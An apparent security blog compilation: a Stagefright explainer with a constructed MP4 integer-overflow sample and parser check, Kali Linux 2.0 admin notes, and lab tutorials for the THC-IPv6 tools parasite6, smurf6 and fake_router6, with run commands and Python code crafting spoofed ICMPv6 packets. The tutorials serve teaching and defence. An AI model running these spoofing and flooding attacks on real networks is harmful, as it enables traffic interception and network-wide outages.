Stagefright – All you need to know

Find out whether your device is vulnerable and defend against the Stagefright vulnerability

Stagefright is one of the largest-scale Android vulnerabilities to date, affecting up to an estimated billion devices worldwide. Put simply, it is a set of flaws in Android's media library that let an attacker take control of your device by sending you a specially crafted MMS. The message can arrive through your carrier's messaging app, Google Hangouts or any other app that auto-downloads MMS content. If the malicious MMS is downloaded, the attacker's code runs; you do not need to open the message at all. From there the attacker can reach your email, Facebook, WhatsApp and other data on the device. So first and foremost, right now, switch off the auto-download media option in Messaging, Google Hangouts and any other messaging apps installed on your Android device.

More Specific Details for the IT Guys.

Stagefright (libstagefright) is Android's media playback engine: a single library that parses and decodes many media formats (MP4, 3GPP and others). It is written in native C++ for performance, but C++ offers no memory safety, so parsing untrusted input in it is prone to integer overflows and memory corruption. In August 2015 (the month this article was written), Zimperium, a company providing enterprise mobile security solutions, publicised a set of vulnerabilities in the Stagefright library. Its research arm, zLabs, presented the details at Black Hat USA on August 5 and at DEF CON 23 on August 7. The bugs had been found in April 2015 by zLabs researcher Joshua Drake, who reported them to Google together with patches. Although Google has accepted the fixes, the researchers estimate that around 950 million Android devices are still vulnerable because the patches have not yet reached them.

Technically Speaking

The disclosure covers seven remote code execution and privilege escalation vulnerabilities in the Stagefright library. Detailed write-ups were still sparse at the time of writing, but the CVE numbers are public. For each, the bug class, impact and affected parser are listed:

  • CVE-2015-1538 – Integer overflow, remote code execution, MP4 atom parsing
  • CVE-2015-1539 – Integer underflow, remote code execution, MP4 atom parsing
  • CVE-2015-3824 – Integer overflow, remote code execution, MP4 atom parsing
  • CVE-2015-3826 – Buffer over-read, 3GPP metadata
  • CVE-2015-3827 – Integer underflow, remote code execution, MP4 atom parsing
  • CVE-2015-3828 – Integer underflow, remote code execution, 3GPP metadata
  • CVE-2015-3829 – Integer overflow, remote code execution, MP4 atom parsing
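To make the bug class concrete, here is an added example (not Zimperium's, Google's or this article's own code): a small Python walker for MP4 boxes that shows the vulnerable pattern, a 32-bit multiplication of an attacker-controlled entry count by the entry size that silently wraps, next to the hardened check a parser should apply. The 'stsc' sample-to-chunk table is used for illustration only; the count 0x15555556 and the box layouts are constructed here, not taken from any real exploit file.

```python
import struct

# Illustrative table: 'stsc' (sample-to-chunk) entries are three uint32 fields.
# The pattern count * entry_size shows up in several MP4 tables libstagefright
# parses; the atom and the constants below are chosen for illustration only.
ENTRY_SIZE = 12
UINT32_MAX = 0xFFFFFFFF
CONTAINERS = {b"moov", b"trak", b"mdia", b"minf", b"stbl"}


def box(kind: bytes, payload: bytes) -> bytes:
    """Serialise one MP4 box: big-endian 32-bit size (header included) + type."""
    return struct.pack(">I4s", 8 + len(payload), kind) + payload


def iter_boxes(data: bytes):
    """Walk the boxes in `data`, refusing any size that runs past the buffer."""
    offset = 0
    while offset + 8 <= len(data):
        size, kind = struct.unpack_from(">I4s", data, offset)
        if size < 8 or offset + size > len(data):
            raise ValueError("malformed box size %d at offset %d" % (size, offset))
        yield kind, data[offset + 8:offset + size]
        offset += size


def find_boxes(data: bytes, wanted: bytes):
    """Yield the payload of every `wanted` box, descending into known containers."""
    for kind, payload in iter_boxes(data):
        if kind == wanted:
            yield payload
        elif kind in CONTAINERS:
            yield from find_boxes(payload, wanted)


def table_entry_count(payload: bytes) -> int:
    """Table payload: 1 byte version, 3 bytes flags, uint32 entry_count, entries."""
    if len(payload) < 8:
        raise ValueError("truncated table header")
    return struct.unpack_from(">I", payload, 4)[0]


def alloc_size_unchecked(entry_count: int) -> int:
    """Vulnerable pattern: a 32-bit multiply that wraps silently. The parser then
    allocates this many bytes but goes on to copy entry_count entries into it."""
    return (entry_count * ENTRY_SIZE) & UINT32_MAX


def check_table(payload: bytes) -> str:
    """Hardened pattern: bound the count before multiplying, then bound the
    table against the box that contains it."""
    entry_count = table_entry_count(payload)
    if entry_count > (UINT32_MAX - 8) // ENTRY_SIZE:
        return "reject: entry_count would overflow 32-bit size"
    if entry_count * ENTRY_SIZE > len(payload) - 8:
        return "reject: table larger than its box"
    return "ok"


def scan_mp4(data: bytes) -> list:
    """One verdict per 'stsc' table found anywhere under moov/trak/.../stbl."""
    return [check_table(p) for p in find_boxes(data, b"stsc")]


def stsc_payload(entry_count: int, entries: bytes = b"") -> bytes:
    return b"\x00\x00\x00\x00" + struct.pack(">I", entry_count) + entries


def wrap_in_stbl(table: bytes) -> bytes:
    return box(b"moov", box(b"trak", box(b"mdia", box(b"minf", box(b"stbl", table)))))


# Constructed samples, not real files: a benign one-entry table and a table whose
# count makes 12 * count wrap to 8 when the multiply is done in 32 bits.
OVERFLOW_COUNT = 0x15555556            # 0x15555556 * 12 == 0x1_0000_0008
BENIGN = wrap_in_stbl(box(b"stsc", stsc_payload(1, struct.pack(">III", 1, 1, 1))))
MALICIOUS = wrap_in_stbl(box(b"stsc", stsc_payload(OVERFLOW_COUNT)))

if __name__ == "__main__":
    print("unchecked 32-bit allocation for malicious count:", alloc_size_unchecked(OVERFLOW_COUNT))
    print("benign   :", scan_mp4(BENIGN))
    print("malicious:", scan_mp4(MALICIOUS))
```

With the wrapped size the parser would allocate 8 bytes and then copy 0x15555556 entries into it: a classic heap overflow. The hardened check bounds the count before multiplying, then bounds the table against its enclosing box, and so rejects both the wrapping count and a table that merely claims more entries than the box holds.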

See this Video for POC

For the common users & kids

This is nothing to panic about; there is no need to switch your phone off. The attack arrives as a malicious MMS or media message in your messaging app, Google Hangouts or a similar app. Turn OFF automatic media download and do not open MMS or even text messages from unknown senders. Keep your apps updated and install Android updates as soon as they are offered. If you are still worried, turn off Wi-Fi and mobile data; nobody can reach your device then. (:P)

How to detect whether your device is Affected

A few apps in the Play Store can detect this vulnerability from within the device itself. Two of them are described here:

  1. Stagefright Detector – Lookout Mobile Security
  2. Stagefright Detector – Zimperium INC.

Stagefright Detector – Lookout Mobile Security

[Screenshot: Lookout Security Stagefright Detector]

This one is intended for normal users who do not want the technical details. The app simply checks whether your device is vulnerable and shows a summary of the result. Finding it is easy; it is usually the second result when you search for “Stagefright Detector” in the Play Store. Here is the link:

Stagefright Detector – Lookout Mobile Security

Install it like any other app. When you open it, detection starts automatically and the result is displayed once it finishes, along with some useful links.

It is as simple as unlocking your phone. Try it.

Here are some Screenshots.

Stagefright Detector – Zimperium INC.

[Screenshot: Zimperium Stagefright Detector]

This is the app from Zimperium, the security research firm that discovered the vulnerability. Besides telling you whether the device is vulnerable, it reports exactly which of the CVEs affect it, listing each CVE number in red or green.

For example, if your device is affected by CVE-2015-3824, that entry turns red; the ones that do not apply are shown in green.

Finding and installing the app is simple; it is the first result when you search for “stagefright detector” in the Play Store. Here is the link:

Stagefright Detector – Zimperium INC.

After installation, open the app & tap the “Begin Analysis” Button to start analysing your device. After successful detection, the app displays the result in a manner as described earlier.

Here are the screenshots:

How to defend against it ?

1. Update Android

The best solution is to install the Android update as soon as it is available for your device. Google has released Android 5.1.1_r9, which patches these issues, and as of August 2015 fixes are available for Nexus devices and some HTC and Samsung models. Patches for more devices are expected soon; how quickly they arrive depends on your device manufacturer and carrier.

2. Disable Auto Downloads

The first and most important step is to stop untrusted MMS content from being processed automatically. Because the exploit triggers when the media is parsed, an attacker can use an MMS the way a phishing link is used, except that no click is required. So here is the list of tasks:

Turn OFF the auto retrieve for multimedia messages.

On your Android device, go to Messaging > Settings > Auto-retrieve and uncheck the option.

Do the same for Hangouts also.

[Screenshot: disabling auto-retrieve]

Conclusion

After Heartbleed, Stagefright is the most widespread vulnerability to affect such a large range of devices. There are system-level patches and there are human-level defences, and in my opinion the human-level defence matters more right now, because so many end-user devices remain unpatched. Making Android users aware of what this flaw is and how to defend against it is critical. Helping someone protect their privacy is closer to social work than to simply telling them their device is vulnerable, so do it any way you can.


More Core Changes in Kali Sana (V 2.0)

More Linux Core Changes in Kali Sana are to be noticed. (Also applies to Other Latest Linux Distros)

Kali Linux 2.0 inherits several changes from Debian that alter how the system boots, configures its network and keeps logs. This article introduces three of them. Although the focus is Kali Linux, the same applies to other current Linux distributions. None of these components is brand new (systemd, for example, dates from 2010), but Debian-based systems only recently adopted them as defaults, and they change how you administer the system day to day.

Here in this article, 3 core level changes are discussed.

1. Systemd & Systemctl

2. New Network Manager

3. Journalctl

1. Systemd & Systemctl

systemd (the name simply means “system daemon”; the trailing d follows the Unix convention for daemons) replaces the classic SysV init process as PID 1, the parent of all other processes. Where init ran its scripts one after another, systemd starts services in parallel and tracks their dependencies explicitly, so boot is considerably faster and a failing service no longer blocks the ones after it. It also brings a new logging system, journald, described later in this article.

In practice the core change is that runlevels have been replaced by targets. Everything systemd manages is a unit: services, sockets, targets, timers, mount points and so on. Entering a runlevel becomes “reaching a target” (for example multi-user.target instead of runlevel 3, graphical.target instead of runlevel 5).

Read More: http://www.tecmint.com/systemd-replaces-init-in-linux/

https://wiki.debian.org/Debate/initsystem/systemd

Tasks:

1. Check ssh with both methods

2. Some more interesting things using systemctl

The table below compares init commands with their systemd equivalents. On init-based systems the service command controls daemons; on systemd-based systems it is systemctl. For example, "service ssh status" becomes "systemctl status ssh", "service ssh start" becomes "systemctl start ssh", and "update-rc.d ssh enable" (or "chkconfig ssh on" on Red Hat-style systems) becomes "systemctl enable ssh". Have a look at the table and try it yourself.

[Table image: comparison of init (service) and systemd (systemctl) commands]

Here are some screenshots(Click to Enlarge).

Here is a list of other systemctl tricks

systemctl list-units --type=target        # show all loaded targets
systemctl list-units                      # list all loaded units; pipe to grep to filter
systemctl list-unit-files                 # list all installed unit files and their enable state
systemctl list-dependencies               # dependency tree of the default target (pass a unit name to inspect another)
systemctl get-default                     # show the default target; graphical.target in Kali Sana
systemctl set-default multi-user.target   # change the default target (boot to a text console)

2. New Network Manager – NMCLI

nmcli and nmtui are the two new interfaces to NetworkManager: nmcli is the command-line tool and nmtui a curses-style text interface. Both are available in Kali Linux 2.0, and other distributions such as CentOS/RHEL/Fedora are moving to them as well.

With nmcli we can add, edit or remove network connections and adjust every detail of each one. Creating bridges and bonded (teamed/aggregated) connections is just a few keystrokes away.

Tasks

  1. View current State using nmcli
  2. Start & Stop a connection using nmcli
  3. Setup a connection with nmtui

1. View Current Status

nmcli connection show              # list all connections; press Tab twice after "show" to complete a name
nmcli con show eth0                # details of one connection; replace eth0 with yours

Here are some Screenshots(Click to Enlarge)

2. Start & Stop Connections

nmcli con show eth0<replace with yours>
nmcli con down eth0
nmcli con up eth0

3. Set up a connection with nmtui

For this, I have added a second network adapter to the VM, and we give the new NIC a static address.

nmtui is an interactive, menu-driven tool (choose “Edit a connection”, pick the new interface, set the IPv4 configuration to Manual and enter the address), so you can follow it on your own.

Here are screenshots of NMTUI(Click to Enlarge)

Refs: Redhat, GNOME Wiki

3. Journalctl

The journal is a structured logging system that collects log data, together with metadata about its source, from many places on the system: the kernel, systemd itself, services' stdout/stderr and traditional syslog() calls. The data is stored in an indexed binary format under /run/log/journal (volatile) or /var/log/journal (persistent), so searches are fast. The journal can run alongside a legacy syslog daemon such as rsyslog, which continues to write the familiar text files under /var/log.

The journald service does the collecting and storing; journalctl is the tool for reading it. Because everything is indexed, journalctl can filter by unit, time, priority or any other field very quickly, which makes troubleshooting considerably faster.

Tasks

View logs with journalctl.

journalctl          # the whole journal, oldest first, in a pager
journalctl -xn      # the last 10 entries (-n) with explanatory catalog text (-x) where available
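As an added example (not part of the original article), here is how the structured output becomes useful for security work: journalctl -o json prints one JSON object per entry with fields such as MESSAGE, _SYSTEMD_UNIT and __REALTIME_TIMESTAMP (microseconds since the epoch), which this Python snippet parses to find failed SSH logins and the source addresses behind them. The sample lines are constructed to look like journalctl -u ssh -o json output; the addresses are from documentation ranges.

```python
import json
import re
from collections import Counter
from datetime import datetime, timezone

# sshd's own wording for failed password attempts, with or without "invalid user".
FAILED_RE = re.compile(r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+")

# Constructed sample of `journalctl -u ssh -o json --no-pager` output: one JSON
# object per line; __REALTIME_TIMESTAMP is microseconds since the epoch as a string.
SAMPLE_JOURNAL = """\
{"__REALTIME_TIMESTAMP": "1439462400000000", "_HOSTNAME": "kali", "_SYSTEMD_UNIT": "ssh.service", "SYSLOG_IDENTIFIER": "sshd", "PRIORITY": "6", "MESSAGE": "Accepted publickey for root from 192.0.2.10 port 40110 ssh2"}
{"__REALTIME_TIMESTAMP": "1439462405000000", "_HOSTNAME": "kali", "_SYSTEMD_UNIT": "ssh.service", "SYSLOG_IDENTIFIER": "sshd", "PRIORITY": "6", "MESSAGE": "Failed password for root from 198.51.100.7 port 51234 ssh2"}
{"__REALTIME_TIMESTAMP": "1439462406000000", "_HOSTNAME": "kali", "_SYSTEMD_UNIT": "ssh.service", "SYSLOG_IDENTIFIER": "sshd", "PRIORITY": "6", "MESSAGE": "Failed password for invalid user admin from 198.51.100.7 port 51235 ssh2"}
{"__REALTIME_TIMESTAMP": "1439462407000000", "_HOSTNAME": "kali", "_SYSTEMD_UNIT": "ssh.service", "SYSLOG_IDENTIFIER": "sshd", "PRIORITY": "6", "MESSAGE": "Failed password for invalid user test from 203.0.113.9 port 60001 ssh2"}
{"__REALTIME_TIMESTAMP": "1439462410000000", "_HOSTNAME": "kali", "_SYSTEMD_UNIT": "NetworkManager.service", "SYSLOG_IDENTIFIER": "NetworkManager", "PRIORITY": "6", "MESSAGE": "<info>  device (eth0): state change: ip-config -> ip-check"}
"""


def parse_journal(text: str) -> list:
    """Turn journalctl -o json output into a list of dicts, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def entry_time(entry: dict) -> str:
    """Render __REALTIME_TIMESTAMP (microseconds, as a string) as ISO-8601 UTC."""
    seconds = int(entry["__REALTIME_TIMESTAMP"]) // 1_000_000
    return datetime.fromtimestamp(seconds, tz=timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")


def failed_logins(entries: list, unit: str = "ssh.service") -> list:
    """(time, user, source ip) for every failed password attempt logged by `unit`."""
    hits = []
    for e in entries:
        if e.get("_SYSTEMD_UNIT") != unit:
            continue
        m = FAILED_RE.search(e.get("MESSAGE", ""))
        if m:
            hits.append((entry_time(e), m.group("user"), m.group("ip")))
    return hits


def noisy_sources(entries: list, threshold: int = 2) -> dict:
    """Source addresses with at least `threshold` failed attempts, with their counts."""
    counts = Counter(ip for _, _, ip in failed_logins(entries))
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    entries = parse_journal(SAMPLE_JOURNAL)
    for when, user, ip in failed_logins(entries):
        print(when, user, ip)
    print("sources over threshold:", noisy_sources(entries))
```

On a live system you would feed it "journalctl -u ssh -o json --since today" instead of the embedded sample; the unit name is ssh.service on Debian and Kali (sshd.service on Red Hat-style systems).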

Here are the screenshots(Click to enlarge)

Refs: Redhat, DigitalOcean

Conclusion

Putting it all together, Kali Linux has had a complete core-level changeover, which may be one of the reasons the developers jumped from version 1.1 straight to 2.0. With a newer kernel, a new logging system and a new network manager, Kali Linux 2.0 is more stable and well placed to remain the industry-standard penetration-testing distribution.

First Look at Kali Linux 2.0

A rebirth of a penetration testing distribution – Kali Linux 2.0 Codename: Kali Sana

On August 11th, Kali Linux 2.0, codenamed Sana, was released. After a series of incremental changes from Kali 1.0 to 1.1, Offensive Security, the makers of Kali Linux, decided on a 2.0 release with the biggest changes since the distribution first appeared: accessibility and usability improvements, newer tools and a more recent, more stable kernel. The new version has a more user-friendly, interactive desktop environment and, the developers say, is highly customisable. Another notable change is that Kali Linux now supports a wide range of ARM devices, including some recent smartphones.

Here are the major updates

GNOME 3 Session

The most visible change in the new version is a full GNOME 3 session; older versions used GNOME's fallback mode with limited features. Many people were reluctant to move from BackTrack to Kali because of its completely dark environment and pitch-black wallpaper. The new version comes with a brighter wallpaper, the GNOME 3 hot corner (application overview), a customisable sidebar, an updated and customised GNOME Shell theme and many other visual tweaks.

Pros:

  1. More user friendly
  2. Highly Customizable
  3. Comes with Gnome-Tweak-Tool by default
  4. Brighter Experience.
  5. Additional features like multiple desktops, easy screen & sound recorder, apps corner etc.

Cons:

  1. Minimum requirements are higher.
  2. Consumes more resources.

Here are some Screenshots

 

Better support for ARM boards and other embedded kits

[Image: Kali Linux on ARM devices]

Officially, Kali Linux images are now available for all major Google Chromebooks, the Raspberry Pi, ODROID boards and several other single-board computers. Kali NetHunter images also have more stable support for Nexus devices and, new in this release, the OnePlus One. The developers say compiling new drivers is easier because the full kernel sources and headers are now included.

They have also released new VMware and VirtualBox images with improved guest-addition packages.

[Image: Kali NetHunter on a OnePlus One]

Pros:

  1. Complete kernel solves many driver issues found on earlier versions.
  2. Better for those with a background in embedded/robotics/electronics: Kali can now be installed on Chromebooks and other ARM-based systems.
  3. Nethunter for Nexus 5 – 10 & for OnePlus 1.

Cons: Probably none

Know More: https://www.offensive-security.com/kali-linux-nethunter-download/

A list of Images: https://www.offensive-security.com/kali-linux-vmware-arm-image-download/

Metasploit

This is one of the main drawbacks of the new version. Kali Linux 2.0 ships only the open-source metasploit-framework package; the web UI and the other Community/Pro features are no longer included. Metasploit Community can still be downloaded from Rapid7’s website, registered and installed separately.

[Screenshot: Metasploit]

Pros:

What could that be? The advantage, the developers claim, is a faster and smoother experience because Metasploit now runs on native Ruby packages.

Cons:

  1. There is no longer a metasploit service. You have to start PostgreSQL and initialise the database yourself before launching msfconsole ("systemctl start postgresql" followed by "msfdb init").
  2. The much more user-friendly web UI of Metasploit Community/Pro is not available.

Updated & Better Tools.

At first look, the old menu system has seen only minor changes, but new tools have been added. One notable addition is PixieWPS, which can be used to attack WPS (the pixie-dust attack) far faster than online brute force. The kernel is Linux 4.0. The developers are also sticking to Debian standards: packages are pulled continuously from the Debian testing repository and new packages are tested on Kali Linux. This makes it a stable yet cutting-edge distribution that stays compliant with Debian.

Conclusion

All in all, Offensive Security, the makers of Kali Linux, have taken the 2.0 release very seriously. They have made drastic changes to support a far wider range of devices and to improve stability, and with the new and improved tool set and interface, Kali Sana is the most powerful penetration-testing distribution to date.

parasite6 – Redirect all IPv6 traffic through your attacker machine

Redirect all IPv6 traffic through your attacker machine with parasite6

Parasite6 is the arpspoof of IPv6 networks and part of the THC-IPv6 toolkit. As always with THC, it is simple and effective. IPv6 has no ARP; hosts learn each other's link-layer addresses through Neighbor Discovery, using Neighbor Solicitation and Neighbor Advertisement messages. Parasite6 listens for every Neighbor Solicitation on the link and answers it with a spoofed Neighbor Advertisement claiming that the requested address, whatever it is (including the router's), lives at the attacker's MAC. Hosts update their neighbor caches accordingly, so virtually all traffic on the IPv6 segment is sent to the attacker, who forwards it on. We can supply a fake MAC address or run it without one; either way it works just like arpspoof.

Options

Syntax: parasite6 [-lRFHD] interface [fake-mac]
  -l   loop and resend the packets per target every 5 seconds
  -R   try to inject the destination of the solicitation

  NS security bypass options:
  -F   add a fragment header
  -H   add a hop-by-hop header
  -D   add a large destination header

Homepage: https://www.thc.org/thc-ipv6/

Reference: Cisco

Note: This tutorial was written when Kali 1.0.9 was the latest release. In newer versions (Kali Sana and Kali Rolling) the THC-IPv6 commands carry an atk6- prefix; parasite6, for example, becomes atk6-parasite6.

Lab: Spoof the network and Route all packets through your system.

Scenario: I have an IPv6 network & some IPv6 hosts

IPv6 network : fc00::01/64

Attacker : Kali Linux VM

It is as simple as it sounds: first enable IPv6 forwarding so that the intercepted traffic is passed on (otherwise the spoofing turns into a denial of service), then run parasite6.

Command: echo 1 > /proc/sys/net/ipv6/conf/all/forwarding
Command: parasite6 eth0 -l    (replace eth0 with your interface)
[Screenshot: packets being spoofed]

Try the other options yourself, including a fake MAC address as the optional last argument (the square brackets in the syntax only mark it as optional; do not type them).

To check that it is working, look at the traffic with passive_discovery6 (click here for the tutorial on it) or with any sniffer such as urlsnarf, driftnet or Wireshark.


smurf6

Perform a smurf attack, a distributed denial of service (DDoS) amplified by every host on the segment, against a whole IPv6 network using smurf6

Smurf6 performs a smurf attack on an IPv6 network. A smurf attack is a denial-of-service attack in which the attacker pings the broadcast address with the victim's address as the spoofed source. Every node on the network receives an ICMP echo request that appears to come from the victim, and every one of them replies to the victim, so the victim is flooded by the whole network at once: a distributed denial of service. In IPv4 this rarely works any more, because modern routers and switches do not forward directed broadcasts, but IPv6 is still vulnerable. Take a look at the following image for a better understanding of the attack.

[Diagram: schematic of a smurf attack]

Smurf6 sends a flood of ICMPv6 echo requests to the all-nodes multicast address (IPv6 has no broadcast) with the victim's IP address as the spoofed source. Every node on the link then sends its echo reply to the victim, turning the whole segment into a DDoS source.

Reference : http://searchsecurity.techtarget.com/definition/smurfing

http://www.cisco.com/web/about/security/intelligence/guide_ddos_defense.html

Homepage: https://www.thc.org/thc-ipv6/

Note: This tutorial was written when Kali 1.0.9 was the latest release. In newer versions (Kali Sana and Kali Rolling) the THC-IPv6 commands carry an atk6- prefix; smurf6, for example, becomes atk6-smurf6.

Options

Syntax: smurf6 interface victim-ip [multicast-network-address]
Example: smurf6 eth0 8ea0::001a [8ea0::00/64]

Lab : Perform a Smurf attack on an IPv6 network.

This is pretty simple with smurf6. All you have to do is find the IPv6 network range and a victim host. Even without a specific host, smurf6 will happily flood the entire segment with ICMPv6 requests. See the post on passive discovery for how to discover IPv6 hosts and networks.

http://kalilinuxtutorials.com/ig/passive_discovery6/

Note: This is a vandalizing DDoS attack. The authors of this article or the tool itself are not responsible in any ways for the consequences faced if misused. Use this only on a test network or with a Proper Agreement if in case you want to execute on a live environment.

Scenario: To be frank, this is a very destructive attack. It brings down every system on the target network, not just the victim host. For this simple tutorial I had to prepare a lot, because carrying out the attack kills everything on the network, so I had to run it from a separate live machine to complete the tutorial. Let's see how.

Coming to the point, I have 2 VMs and a network which supports both IPv4 & IPv6

  • IPv4 network range: 192.168.0.0/24
  • IPv6 network range: fc00::/64
  • Attacker, Kali Linux (VM): 192.168.0.102/24, fc00::5/64
  • Victim, RHEL 7 (VM): 192.168.0.110/24, fc00::3/64
  • Windows 8.1 Pro (physical host): 192.168.0.100/24, fc00::4/64

Let’s proceed.

Command: smurf6 eth0 fc00::3 fc00::/64    (replace the interface, victim address and network with yours; the brackets in the syntax only mark the network as optional)

Wait a minute and you can see everyone in the office going crazy...!

I was able to take only one screenshot. I ran the attack over an SSH session to the Kali box; otherwise every VM, including my physical machine, would have locked up and there would have been nothing I could do except pull the power cable. Et voilà.

Take a good look at the following screenshot and at my annotations on each window: CPU usage spikes as soon as the attack is launched.

[Screenshot: CPU usage of systems on the network spiking]

I am not sure why Offensive Security lists this under stress testing. Perhaps it is useful for seeing how much the network and its equipment can take, by observing how long it takes every node to fall over, or, on a large network with many hosts and services such as Windows AD, for testing whether the gateway copes and whether anything prevents echo requests to the all-nodes address. For now the simplest countermeasure is to disable IPv6 on internal networks where it is not needed; where it is needed, rate-limit ICMPv6 and apply neighbor-discovery protections at the switch.


fake_router6

Create a rogue IPv6 router in one simple step with fake_router6

fake_router6 is one of the THC-IPv6 tools bundled with Kali Linux for testing, exploiting and attacking weaknesses and protocol complexity in IPv6 and ICMPv6. As the name suggests, it comes from The Hacker's Choice. Before we begin the attack, let's get under the hood for a minute. In IPv4 you know ARP; in IPv6 it is replaced by ND, Neighbor Discovery. ND combines the functions of ARP, ICMP Router Discovery and ICMP Redirect from IPv4 and adds more: discovering neighbouring hosts and routers, resolving layer-2 (link-layer) addresses, detecting duplicate addresses, advertising a router's presence and the prefixes on the link, and so on. There are five ND message types:

  • Router Solicitation (ICMPv6 type 133)
  • Router Advertisement (ICMPv6 type 134)
  • Neighbor Solicitation (ICMPv6 type 135)
  • Neighbor Advertisement (ICMPv6 type 136)
  • Redirect (ICMPv6 type 137)

Here we focus on the second, Router Advertisement. An IPv6 router periodically (and in response to Router Solicitations) sends RA packets to the all-nodes multicast address. An RA carries the router's link-layer address, the prefixes in use on the link, the MTU and other parameters a host needs. When a host joins the network it receives the RA, adds the sender to its default router list and, with stateless address autoconfiguration (SLAAC), builds itself an address in the advertised prefix.

fake_router6 sends Router Advertisements with high router preference and a prefix of the attacker's choosing. Even if legitimate IPv6 routers are present, hosts on the link accept the rogue router, install it as a default gateway and configure addresses from the advertised prefix.
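All three THC-IPv6 tools covered on this page (parasite6, smurf6 and fake_router6) work by sending crafted ICMPv6 messages, so here is one added Python example, not part of the original tutorials or of THC's code, that builds those three messages byte by byte: a Neighbor Advertisement with the Override flag (what parasite6 answers solicitations with), a Router Advertisement with high preference and an autonomous prefix (what fake_router6 sends) and an Echo Request to ff02::1 with a spoofed source (what smurf6 floods). It also computes the ICMPv6 checksum over the IPv6 pseudo-header, which is what makes a spoofed packet acceptable to receivers. The addresses and MAC are made up; actually putting the packets on the wire needs a raw or link-layer socket and root, which is left out here.

```python
import ipaddress
import struct

ICMPV6 = 58            # IPv6 next-header value for ICMPv6
ALL_NODES = "ff02::1"  # link-local all-nodes multicast (IPv6 has no broadcast)
ND_TYPES = {128: "Echo Request", 133: "Router Solicitation", 134: "Router Advertisement",
            135: "Neighbor Solicitation", 136: "Neighbor Advertisement", 137: "Redirect"}


def pseudo_header(src: str, dst: str, length: int) -> bytes:
    """IPv6 upper-layer pseudo-header (RFC 2460 s8.1) that the ICMPv6 checksum covers."""
    return (ipaddress.IPv6Address(src).packed + ipaddress.IPv6Address(dst).packed
            + struct.pack(">I", length) + b"\x00\x00\x00" + bytes([ICMPV6]))


def checksum(data: bytes) -> int:
    """Internet checksum: ones'-complement sum of 16-bit words, odd byte zero-padded."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack(">%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def icmpv6(src: str, dst: str, msg_type: int, body: bytes) -> bytes:
    """Build type | code 0 | checksum | body, with the checksum filled in."""
    msg = struct.pack(">BBH", msg_type, 0, 0) + body
    csum = checksum(pseudo_header(src, dst, len(msg)) + msg)
    return msg[:2] + struct.pack(">H", csum) + msg[4:]


def checksum_ok(src: str, dst: str, pkt: bytes) -> bool:
    """A receiver's check: the sum over pseudo-header + message must come out zero."""
    return checksum(pseudo_header(src, dst, len(pkt)) + pkt) == 0


def lladdr_option(opt_type: int, mac: str) -> bytes:
    """8-byte ND option: type 1 = Source Link-Layer Address, 2 = Target Link-Layer Address."""
    return struct.pack(">BB", opt_type, 1) + bytes.fromhex(mac.replace(":", ""))


def neighbor_advertisement(src: str, dst: str, target: str, attacker_mac: str) -> bytes:
    """parasite6-style reply to a Neighbor Solicitation: 'target is at attacker_mac'.
    Flags R (we are a router), S (solicited) and O (override the cached entry) are set."""
    flags = (1 << 31) | (1 << 30) | (1 << 29)
    body = struct.pack(">I", flags) + ipaddress.IPv6Address(target).packed
    return icmpv6(src, dst, 136, body + lladdr_option(2, attacker_mac))


def router_advertisement(src: str, attacker_mac: str, prefix: str, prefix_len: int = 64,
                         mtu: int = 1500, lifetime: int = 1800) -> bytes:
    """fake_router6-style RA to all nodes: Prf=01 (high preference) and a Prefix
    Information option flagged on-link (L) and autonomous (A) so hosts SLAAC into it."""
    flags = 0x08                                              # M=0 O=0 H=0 Prf=01
    body = struct.pack(">BBHII", 64, flags, lifetime, 0, 0)  # hop limit, flags, lifetime, reachable, retrans
    body += lladdr_option(1, attacker_mac)
    body += struct.pack(">BBBBIII", 3, 4, prefix_len, 0xC0,   # Prefix Info option, L|A flags
                        0xFFFFFFFF, 0xFFFFFFFF, 0)            # infinite valid/preferred lifetimes
    body += ipaddress.IPv6Address(prefix).packed
    body += struct.pack(">BBHI", 5, 1, 0, mtu)                # MTU option
    return icmpv6(src, ALL_NODES, 134, body)


def smurf_echo_request(victim: str, ident: int = 1, seq: int = 1) -> bytes:
    """smurf6-style Echo Request: the victim is the *spoofed source* and all-nodes the
    destination, so every node's Echo Reply lands on the victim."""
    return icmpv6(victim, ALL_NODES, 128, struct.pack(">HH", ident, seq) + b"\x00" * 8)


def describe(pkt: bytes) -> str:
    return "%s, %d bytes, checksum 0x%04x" % (ND_TYPES.get(pkt[0], "type %d" % pkt[0]),
                                             len(pkt), struct.unpack(">H", pkt[2:4])[0])


if __name__ == "__main__":
    # Made-up addresses for the demonstration.
    attacker_ll, attacker_mac = "fe80::a", "00:11:22:33:44:55"
    print(describe(neighbor_advertisement(attacker_ll, "fe80::b", "fc00::1", attacker_mac)))
    print(describe(router_advertisement(attacker_ll, attacker_mac, "bad::")))
    print(describe(smurf_echo_request("fc00::3")))
```

Two things the byte layout makes visible: the checksum depends on the source address in the pseudo-header, so a spoofed source must be chosen before the checksum is computed (checksum_ok fails for any other source), and the only thing that makes a host trust a Router Advertisement is that it arrives on the link with a valid checksum, which is why RA Guard on the switch, not the host, is the usual countermeasure.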

Home Page : https://www.thc.org/thc-ipv6/

References : http://tools.kali.org/information-gathering/thc-ipv6

http://computernetworkingnotes.com/ipv6-features-concepts-and-configurations/ipv6-neighbor-discovery.html

https://technet.microsoft.com/en-in/library/cc781672%28v=ws.10%29.aspx

Let's see it in action

Note: This tutorial was written when Kali 1.0.9 was the latest release. In newer versions (Kali Sana and Kali Rolling) the THC-IPv6 commands carry an atk6- prefix; fake_router6, for example, becomes atk6-fake_router6.

Options

Syntax: fake_router6 [-HFD] interface network-address/prefix-length [dns-server [router-ip-link-local [mtu [mac-address]]]]
  -H   add a hop-by-hop header
  -F   add a fragmentation header
  -D   add a destination header

Lab : Advertise a fake router in the network

NOTE: This can knock the whole segment offline, so use it wisely, with permission or on a test network.

Launch the attack with a single command.

Command: fake_router6 eth0 bad::/64    (replace eth0 with your interface and bad::/64 with your fake network)

[Screenshot: the fake_router6 command]

Now I am going to boot a Windows Server 2012 VM that I have; you can try with any machine that supports IPv6.

After that, open cmd & issue

Command: ipconfig

[Screenshot: new clients picking up the rogue prefix]

Now let's try it on a RHEL 7 server.

After booting up the system open terminal & issue

Command : ifconfig

